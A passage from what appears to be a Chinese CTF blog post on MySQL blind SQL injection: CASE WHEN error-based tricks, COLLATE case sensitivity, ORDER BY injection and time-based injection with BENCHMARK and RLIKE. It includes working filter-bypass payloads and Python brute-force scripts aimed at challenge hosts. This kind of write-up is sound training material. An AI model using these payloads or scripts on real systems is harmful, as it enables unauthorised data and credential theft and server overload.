\u5728SQL\u4e2d\u662f\u7c7b\u578b\u8f6c\u6362\u7b26\uff0c\u7528\u6765\u5f3a\u5236\u5c06\u5176\u540e\u7684\u5b57\u7b26\u4e32\u8f6c\u6362\u4e3a\u5b57\u8282,\u5373\u5c06\u5b57\u7b26\u4e32\u5f3a\u5236\u6309\u5b57\u8282\u8fdb\u884c\u6bd4\u8f83\u800c\u4e0d\u662f\u5b57\u7b26\uff0c\u5177\u4f53\u7684\u8868\u73b0\u5373\u4e3a\u533a\u5206\u5927\u5c0f\u5199\uff0c\u4e3b\u8981\u539f\u56e0\u662f\u6b63\u5e38\u60c5\u51b5\u4e0bsql\u662f\u4e0d\u533a\u5206\u5927\u5c0f\u5199\u7684\uff0c\u9664\u975e\u662f\u7528ascii\u7801\u5339\u914d\u5b57\u7b26\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">case when<\/h3>\n\n\n\n<p>\u53c2\u8003<a href=\"https:\/\/cloud.tencent.com\/developer\/article\/2070126\">HFCTF2022_babysql\u9898\u76ee\u590d\u73b0<\/a><\/p>\n\n\n\n<p>\u5b98\u65b9\u6587\u6863\u4e2d\u89e3\u91ca:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>CASE value WHEN [compare-value] THEN result [WHEN [compare-value] THEN result \u2026] [ELSE result] END CASE WHEN 
[condition] THEN <em>result<\/em> [WHEN [condition] THEN result \u2026] [ELSE result] END<\/li>\n<\/ul>\n\n\n\n<p>\u5728\u7b2c\u4e00\u4e2a\u65b9\u6848\u7684\u8fd4\u56de\u7ed3\u679c\u4e2d\uff0c value=compare-value\u3002\u800c\u7b2c\u4e8c\u4e2a\u65b9\u6848\u7684\u8fd4\u56de\u7ed3\u679c\u662f\u7b2c\u4e00\u79cd\u60c5\u51b5\u7684\u771f\u5b9e\u7ed3\u679c\u3002\u5982\u679c\u6ca1\u6709\u5339\u914d\u7684\u7ed3\u679c\u503c\uff0c\u5219\u8fd4\u56de\u7ed3\u679c\u4e3aELSE\u540e\u7684\u7ed3\u679c\uff0c\u5982\u679c\u6ca1\u6709ELSE \u90e8\u5206\uff0c\u5219\u8fd4\u56de\u503c\u4e3a NULL\u3002<\/p>\n\n\n\n<p>\u6bd4\u5982\u6211\u4eec\u4f7f\u7528SELECT CASE 1 WHEN 1 THEN &#8216;one&#8217; WHEN 2 THEN &#8216;two&#8217; ELSE &#8216;more&#8217; END; \u56de\u663e\u5c31\u662f\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-13.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"703\" height=\"260\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-13.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1422\"  sizes=\"auto, (max-width: 703px) 100vw, 703px\" \/><\/div><\/figure>\n\n\n\n<p>\u56e0\u4e3a\u6211\u4eec\u7684select case 1 \u6240\u4ee5\u8fd4\u56de\u7684\u662fwhen 1\u540e\u9762\u8ddf\u7684\u7ed3\u679c\u3002\u5f53\u7136\uff0c\u8fd8\u53ef\u4ee5\u8fdb\u884c\u6761\u4ef6\u5224\u65ad\uff0c\u5982\u4f7f\u7528SELECT CASE WHEN 1&gt;0 THEN &#8216;true&#8217; ELSE &#8216;false&#8217; 
END;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-14.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"516\" height=\"251\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-14.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1423\"  sizes=\"auto, (max-width: 516px) 100vw, 516px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u65f6\u56e0\u4e3a1&gt;0\u7528\u771f\uff0c\u6240\u4ee5\u8fd4\u56detrue\u3002\u82e5\u8bed\u53e5\u7684\u5224\u65ad\u5747\u6ca1\u6709\u7ed3\u679c\uff0c\u5219\u8fd4\u56denull\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-15.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"627\" height=\"261\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-15.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1424\"  sizes=\"auto, (max-width: 627px) 100vw, 
627px\" \/><\/div><\/figure>\n\n\n\n<p>\u5f53\u9898\u76ee\u9700\u8981\u76f2\u6ce8\u4f46\u8fc7\u6ee4\u4e86if()\u6216\u62ec\u53f7\u7b49\u8ba9\u6211\u4eec\u4e0d\u80fd\u4f7f\u7528\u51fd\u6570\u65f6\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u4f7f\u7528case when\u8fdb\u884c\u76f2\u6ce8\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mysql&gt; SELECT * FROM tb;\n+-------------------+------+\n| flag              | id   |\n+-------------------+------+\n| flag{test_f1llag} |    1 |\n+-------------------+------+\n1 row in set (0.00 sec)\nmysql&gt; SELECT id FROM tb WHERE id=0 || CASE 1 WHEN flag REGEXP '^f' THEN 1 ELSE 1+~0 \t   END;\n+------+\n| id   |\n+------+\n|    1 |\n+------+\n1 row in set (0.00 sec)<\/code><\/pre>\n\n\n\n<p>\u5982\u679c\u6ee1\u8db3\u6761\u4ef6\uff0c\u5219\u4e0d\u4f1a\u89e6\u53d1\u540e\u97621+~0\uff0c\u6b63\u5e38\u56de\u663e\uff0c\u800c\u5982\u679c\u4e0d\u6ee1\u8db3\u6761\u4ef6\uff0c\u5219\u4f1a\u5f15\u53d1\u62a5\u9519\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mysql&gt; SELECT id FROM tb WHERE id=0 || CASE 1 WHEN flag REGEXP '^a' THEN 1 ELSE 1+~0 END;\nERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(1 + ~(0))'<\/code><\/pre>\n\n\n\n<p>\u8fd9\u662f\u56e0\u4e3a<code>~<\/code> \u4e3a\u53d6\u53cd\u64cd\u4f5c\u7b26\uff0c0 \u53d6\u53cd\u5373\u4e3a\u6700\u5927\u503c\uff0c\u518d\u52a0 1 \u5c31\u4f1a\u5bfc\u81f4\u6ea2\u51fa\u62a5\u9519\u4e86\uff0c\u56e0\u6b64\u6211\u4eec\u53ef\u4ee5\u8fd9\u6837\u57fa\u4e8e\u62a5\u9519\u7684\u76f2\u6ce8\u6765\u7206\u7834flag\u3002\u5f53\u7136\uff0c\u8fd9\u9053\u9898\u662f\u5f53\u5e74\u864e\u7b26CTF\u7684\u9898\uff0c\u6ca1\u8fd9\u4e48\u7b80\u5355\uff0c\u8fd8\u6709\u5176\u4ed6\u7684\u9650\u5236\uff0c\u8fd9\u91cc\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u5b66\u8ba1\u6570\u6cd5\u548c\u5355(\u53cd)\u5f15\u53f7\u7ed5\u8fc7\u7a7a\u683c\uff0c\u4e5f\u5c31\u662f\u8fd9\u6837\u6784\u9020\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mysql&gt; SELECT id FROM tb WHERE id=0 
||CASE+1e0WHEN`flag`REGEXP'^f'THEN+1e0ELSE~0e0+~0e0END;\n+------+\n| id   |\n+------+\n|    1 |\n+------+\n1 row in set (0.00 sec)\n\nmysql&gt; SELECT id FROM tb WHERE id=0 ||CASE+1e0WHEN`flag`REGEXP'^a'THEN+1e0ELSE~0e0+~0e0END;\nERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(~(0e0) + ~(0e0))'<\/code><\/pre>\n\n\n\n<p>\u6ce8\u610f <code>1E0+~0<\/code>\u662f\u4e0d\u4f1a\u62a5\u6ea2\u51fa\u9519\u8bef\u7684\uff0c\u56e0\u4e3a\u4f7f\u7528\u4e86\u79d1\u5b66\u8ba1\u6570\u6cd5\uff0c\u8303\u56f4\u589e\u5927\u4e86\u3002\u7136\u540e\u8fd8\u6709\u4e00\u4e2a\u95ee\u9898\u5c31\u662f\u8981\u533a\u5206\u5927\u5c0f\u5199\uff0c\u5f53\u65f6\u90a3\u4e2a\u9898\u662f\u628abinary\u7981\u4e86\u7684\uff0c\u8fd9\u91cc\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528COLLATE&#8217;utf8mb4_bin&#8217;\u6216COLLATE&#8217;utf8mb4_0900_as_cs&#8217;\u4ee3\u66ffbinary\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mysql&gt; SELECT 'abc' LIKE 'ABC';\n        -&gt; 1\nmysql&gt; SELECT 'abc' LIKE _utf8mb4 'ABC' COLLATE utf8mb4_0900_as_cs;\n        -&gt; 0\nmysql&gt; SELECT 'abc' LIKE _utf8mb4 'ABC' COLLATE utf8mb4_bin;\n        -&gt; 0\nmysql&gt; SELECT 'abc' LIKE BINARY 'ABC';\n        -&gt; 0<\/code><\/pre>\n\n\n\n<p>\u6700\u540e\u4e5f\u5c31\u662f\u4e00\u4e2a\u5f88\u666e\u901a\u7684\u76f2\u6ce8\u4e86\uff0c\u9644\u4e00\u4e2a\u811a\u672c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import requests\nimport time\n\nsession = requests.session()\n\nburp0_url = \"http:\/\/47.107.231.226:30631\/login\"\nburp0_headers = {\"User-Agent\": \"Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko\/20100101 Firefox\/97.0\",\n                 \"Accept\": \"text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\",\n                 \"Accept-Language\": \"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\", \"Accept-Encoding\": \"gzip, deflate\",\n                 \"Content-Type\": \"application\/x-www-form-urlencoded\", \"Origin\": 
\"http:\/\/47.107.231.226:30631\", \"Connection\": \"close\", \"Referer\": \"http:\/\/47.107.231.226:30631\/\",\n                 \"Upgrade-Insecure-Requests\": \"1\"}\n\nalphabet = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!.@%&amp;*{}&#91;]_-^\/\"\npassword = '^'\n\nwhile True:\n    for i in alphabet:\n        burp0_data = {\"username\": f\"1'||case+1E0when`password`regexp'{password + i}'COLLATE'utf8mb4_bin'then+1E0else+!0E0+~0+!0E0end||'0\", \"password\": \"6878\"}\n        r = session.post(burp0_url, headers=burp0_headers, data=burp0_data)\n        if r.status_code == 401:\n            print(i)\n            password += i\n            break\n        time.sleep(0.3)\n    print(password)<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\u518d\u5f15\u7533\u4e00\u4e0b\uff0c\u6211\u4eec\u5728\u8fd9\u91cc\u89e6\u53d1\u62a5\u9519\u4f7f\u7528\u4e86~\u8fdb\u884c\u53d6\u53cd\uff0c\u8fd9\u73a9\u610f\u513f\u5982\u679c\u88abban\u4e86\u600e\u4e48\u529e\u5462\uff1f\u4e8b\u5b9e\u4e0a~0\u662f\u6709\u5177\u4f53\u7684\u503c\u7684\uff0c\u5c31\u662f9223372036854775807\uff0c\u6240\u4ee5\u7528\u6700\u5927\u6570\u52a0\u4e00\u53739223372036854775807+1\u4e5f\u662f\u80fd\u5f15\u53d1\u62a5\u9519\uff0c\u9664\u6b64\u4e4b\u5916\u8fd8\u53ef\u4ee5\u7528\u5f02\u6216\uff0c\u8fd9\u4e2apayload\u4e5f\u884c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>username=1'||case'1'when`username`COLLATE'utf8mb4_0900_as_cs'like'a%'then'1'else'1'^18446744073709551614%252b2^'1'end%253d'0&amp;password=123<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">order 
by\u6ce8\u5165<\/h3>\n\n\n\n<p>\u8fd9\u79cd\u65b9\u6cd5\u8fd0\u7528\u7684\u60c5\u51b5\u6bd4\u8f83\u6781\u7aef\u4e00\u4e9b\uff0c\u5982\u5e03\u5c14\u76f2\u6ce8\u65f6\uff0c\u5b57\u7b26\u622a\u53d6\/\u6bd4\u8f83\u9650\u5236\u5f88\u4e25\u683c\uff0c\u6211\u4eec\u53ef\u4ee5\u505a\u5230\u505a\u5230\u4e0d\u9700\u8981\u4f7f\u7528<code>like\u3001rlike\u3001regexp<\/code>\u7b49\u5339\u914d\u8bed\u53e5\u4ee5\u53ca\u5b57\u7b26\u64cd\u4f5c\u51fd\u6570\uff0c\u5728\u77e5\u9053\u4e00\u4e2a\u5b57\u6bb5\u540d\u7684\u60c5\u51b5\u4e0b\u83b7\u5f97\u53e6\u4e00\u4e2a\u5b57\u6bb5\u7684\u503c\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u51e0\u4e2a\u4f8b\u5b50\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from sheet1 where \u7528\u6237\u540d = 'admin' union distinct select 1,\"f\" order by 2 desc <\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-21.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"783\" height=\"267\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-21.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1455\"  sizes=\"auto, (max-width: 783px) 100vw, 783px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from sheet1 where \u7528\u6237\u540d = 'admin' union distinct select 1,\"g\" order by 2 desc <\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' 
data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-22.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"836\" height=\"287\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-22.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1457\"  sizes=\"auto, (max-width: 836px) 100vw, 836px\" \/><\/div><\/figure>\n\n\n\n<p>\u6211\u4eec\u8fd9\u91cc\u5176\u5b9e\u5c31\u662f\u5bf9\u7b2c\u4e8c\u4e2a\u5b57\u6bb5\u8fdb\u884c\u6392\u5e8f,\u8ba9\u4ed6\u4ece\u6700\u5c0f\u5f00\u59cb\u53d8\u5316,\u5f53\u67e5\u8be2\u7ed3\u679c\u7b2c\u4e00\u6761\u8fd4\u56de\u7684\u7528\u6237\u540d\u5b57\u6bb5\u662f1\u7684\u65f6\u5019,\u6211\u4eec\u5c31\u77e5\u9053\u8fd9\u4e2a\u5b57\u7b26\u7684ascii\u7801\u51cf\u4e00\u5c31\u662f\u8ddf\u6570\u636e\u5e93\u4e2d\u7684\u76f8\u7b49\u3002\u6240\u4ee5\u5c31\u53ef\u4ee5\u4e00\u4f4d\u4e00\u4f4d\u7684\u731c\u51fa\u6765\u5bc6\u7801\u5b57\u6bb5\u4e86\u3002\u4e00\u4e2a\u4f8b\u5b50\u5c31\u662f<a href=\"https:\/\/fushuling.com\/index.phphttps:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/28\/hbctf2017%e5%a4%a7%e7%be%8e%e8%a5%bf%e5%ae%89\/\">[HBCTF2017]\u5927\u7f8e\u897f\u5b89<\/a>\uff0c\u8fd9\u4e2a\u9898\u91cc\u6587\u4ef6\u88ab\u4e0a\u4f20\u540e\u4f1a\u88ab\u91cd\u547d\u540d\uff0c\u6211\u4eec\u5df2\u77e5\u7684\u6761\u4ef6\u4fbf\u662f\u6587\u4ef6\u7684id\uff0c\u4f46\u540d\u79f0\u672a\u77e5\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u4f7f\u7528\u8fd9\u79cd\u6280\u5de7\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select location from image where id=1 and union 
select 0x41 order by 1<\/code><\/pre>\n\n\n\n<p>\u5f53\u6b63\u786e\u7684\u503c\u4e3a\u6211\u4eec\u8f93\u5165\u7684\u503c\u65f6\uff0c\u5c31\u53ef\u4ee5\u6b63\u5e38\u56de\u663e\u51fa\u6587\u4ef6\u768416\u8fdb\u5236\u5185\u5bb9\uff0c\u6700\u540e\u4e00\u4f4d\u4e00\u4f4d\u5339\u914d\u51fa\u771f\u6b63\u7684\u6587\u4ef6\u540d\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u65f6\u95f4\u76f2\u6ce8<\/h2>\n\n\n\n<p>\u65f6\u95f4\u76f2\u6ce8\u6bd4\u5e03\u5c14\u76f2\u6ce8\u9ad8\u7ea7\u4e00\u70b9\uff0c\u662f\u5728\u9875\u9762\u4e0d\u5b58\u5728\u56de\u663e\u7684\u60c5\u51b5\u4e0b\u901a\u8fc7\u65f6\u95f4\u5dee\u8fdb\u884c\u6ce8\u5165\uff0c\u4e00\u822c\u6765\u8bf4\u80fd\u7528\u5e03\u5c14\u76f2\u6ce8\u7684\u5730\u65b9\u90fd\u80fd\u7528\u65f6\u95f4\u76f2\u6ce8\uff0c\u6bd4\u5982\u8bed\u53e5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from users where username=-1 || if(length(database())&gt;8,sleep(3))<\/code><\/pre>\n\n\n\n<p>\u4f5c\u7528\u662f\u5982\u679clength(database())&gt;8\u5219\u6267\u884csleep(3)\u7684\u64cd\u4f5c\uff0c\u901a\u8fc7\u8bbf\u95ee\u7f51\u9875\u662f\u5426\u5b58\u5728\u65f6\u95f4\u5dee\u6765\u5224\u65ad\u6211\u4eec\u7684\u8bed\u53e5\u662f\u5426\u6b63\u786e\u6267\u884c\uff0c\u8fd9\u91cc\u5148\u4e0d\u8bb2\u811a\u672c\u7684\u5b9e\u73b0\uff0c\u5148\u95ee\u4e00\u4e2a\u95ee\u9898\uff0c\u5982\u679csleep\u88abban\u4e86\u8fd8\u80fd\u65f6\u95f4\u76f2\u6ce8\u5417\uff1f\u5f53\u7136\u662f\u53ef\u4ee5\u7684\uff0c\u6709\u5f88\u591a\u65b9\u6cd5\u90fd\u53ef\u4ee5\u4ee3\u66ffsleep\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u65f6\u95f4\u76f2\u6ce8sleep\u88abban\u600e\u4e48\u529e<\/h3>\n\n\n\n<h3 
class=\"wp-block-heading\">benchmark()<\/h3>\n\n\n\n<p>benchmark()\u51fd\u6570\u7684\u4f5c\u7528\u662f\u91cd\u590d\u6267\u884c\u67d0\u8868\u8fbe\u5f0f\uff0c\u5982benchmark(10000000,md5(&#8216;yu22x&#8217;));<br>\u4f1a\u8ba1\u7b9710000000\u6b21md5(\u2018yu22x\u2019)\uff0c\u56e0\u4e3a\u6b21\u6570\u5f88\u591a\u6240\u4ee5\u5c31\u4f1a\u4ea7\u751f\u5ef6\u65f6\uff0c\u4f46\u8fd9\u79cd\u65b9\u6cd5\u5bf9\u670d\u52a1\u5668\u4f1a\u5bf9\u4ea7\u751f\u5f88\u5927\u7684\u8d1f\u8377\uff0c\u5bb9\u6613\u628a\u670d\u52a1\u5668\u8dd1\u5d29\uff0c\u5982\u679c\u5d29\u6389\u7684\u8bdd\u5c31\u628atime.sleep\u7684\u503c\u6539\u5927\u70b9\uff0c\u9664\u4e86md5\u8fd8\u53ef\u4ee5\u4f7f\u7528\u5176\u4ed6\u51fd\u6570\uff0c\u6bd4\u5982\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>benchmark(1000000,encode(\"hello\",\"good\"));\nbenchmark(1e7,sha1('kradress'));<\/code><\/pre>\n\n\n\n<p>\u6bd4\u5982\u8fd9\u662f\u4e00\u4e2a\u9488\u5bf9ctfshow web217\u7684\u811a\u672c(\u4e0d\u5f97\u4e0d\u8bf4\u4e8c\u5206\u6cd5\u5c31\u662f\u5feb)\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import requests\nimport time\n\n\nurl=\"http:\/\/a0b31d2e-2090-4e10-8341-7392b5a4f0de.challenge.ctf.show\/api\/\"\nflag=''\nfor i in range(1,200):\n    low=32\n    high=128\n    mid=(low+high)\/\/2\n    while low&lt;high:\n        # payload=\"0)or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))&gt;{}),BENCHMARK(1000000,md5('a')),0)#\".format(i,mid)\n        # payload=\"0)or if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxccb'),{},1))&gt;{}),BENCHMARK(1000000,md5('a')),0)#\".format(i,mid)\n        payload=\"0)or if((ascii(substr((select group_concat(flagaabc) from ctfshow_flagxccb),{},1))&gt;{}),BENCHMARK(1000000,md5('a')),0)#\".format(i,mid)\n        \n        data={\n            \"ip\":payload,\n            \"debug\":0\n        }\n        time1=time.time()\n        
r=requests.post(url,data=data)\n        time2=time.time()\n        \n        print(low,mid,high)\n      \n\n        if time2-time1&gt;0.5:\n            low=mid+1\n        else:\n            high=mid\n        mid=(low+high)\/\/2\n    flag+=chr(mid)\n    print(flag)\n    if mid==32:\n        print(flag)  \n        break\n\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">RLIKE REGEXP\u6b63\u5219\u5339\u914d<\/h3>\n\n\n\n<p>\u901a\u8fc7<code>rpad<\/code>\u6216<code>repeat<\/code>\u6784\u9020\u957f\u5b57\u7b26\u4e32\uff0c\u52a0\u4ee5\u8ba1\u7b97\u91cf\u5927\u7684pattern\uff0c\u901a\u8fc7repeat\u7684\u53c2\u6570\u53ef\u4ee5\u63a7\u5236\u5ef6\u65f6\u957f\u77ed<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'<\/code><\/pre>\n\n\n\n<p>\u8fd9\u4e2apayload\u7684\u503c\u5c31\u7ea6\u7b49\u4e8esleep(5)\uff0c\u4f46\u662f\u901a\u8fc7\u9898\u76ee\u6d4b\u8bd5\u53d1\u73b0\u5ef6\u65f6\u5f88\u5c0f\uff0c\u6240\u4ee5\u628atimeout\u4e5f\u6539\u5c0f\u70b9\uff0c\u4e25\u91cd\u6000\u7591\u53ef\u80fd\u662fsleep(0.5)\uff0c\u8fd9\u662fctfshow web218\u7684\u811a\u672c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import requests\nimport time\n\n\nurl=\"http:\/\/982d6f48-bb6d-4823-8236-29009a00f0d6.challenge.ctf.show\/api\/\"\nflag=''\nfor i in range(1,200):\n    low=32\n    high=128\n    mid=(low+high)\/\/2\n    while low&lt;high:\n        # payload=\"0)or if((ascii(substr((select group_concat(table_name) from information_schema.tables where 
table_schema=database()),{},1))&gt;{}),(concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) rlike '(a.*)+(a.*)+b'),1)#\".format(i,mid)\n        # payload=\"0)or if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{},1))&gt;{}),(concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) rlike '(a.*)+(a.*)+b'),1)#\".format(i,mid)\n        payload=\"0)||if((ascii(substr((select group_concat(flagaac) from ctfshow_flagxc),{},1))&gt;{}),(concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) rlike '(a.*)+(a.*)+b'),1)#\".format(i,mid)\n        \n        data={\n            \"ip\":payload,\n            \"debug\":0\n        }\n        time1=time.time()\n        r=requests.post(url,data=data)\n        time2=time.time()\n        \n        print(low,mid,high)\n      \n\n        if time2-time1&gt;0.5:\n            low=mid+1\n        else:\n            high=mid\n        mid=(low+high)\/\/2\n    flag+=chr(mid)\n    print(flag)\n    if mid==32:\n        print(flag)  \n        break<\/code><\/pre>\n\n\n\n<h3 
